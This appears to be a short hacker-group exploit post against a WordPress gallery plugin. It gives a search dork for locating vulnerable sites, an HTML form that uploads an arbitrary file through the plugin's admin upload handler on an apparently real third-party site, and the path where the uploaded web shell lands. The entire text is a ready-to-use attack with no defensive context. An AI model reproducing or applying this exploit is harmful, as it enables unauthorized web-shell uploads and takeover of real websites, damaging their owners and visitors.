Assalamuallaikum Wr.Wb
- #$idoarjo Getar | Stay calm and Hide our Skills
- #Author: aAn
- #Dork: inurl:"wp-easy-gallery-pro"
- #Type: CSRF & Xampp ,Uploadify
- #Tested:-
- #CMS:WordPress
Vulnerable & Exploits: /wp-content/plugins/wp-easy-gallery/admin/php.php
CSRF:
<form enctype="multipart/form-data"
action="http://bushwickcenter.net/wp-content/plugins/wp-easy-gallery-pro/admin/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
Shell Location : /wp-content/uploads/jiwa.php
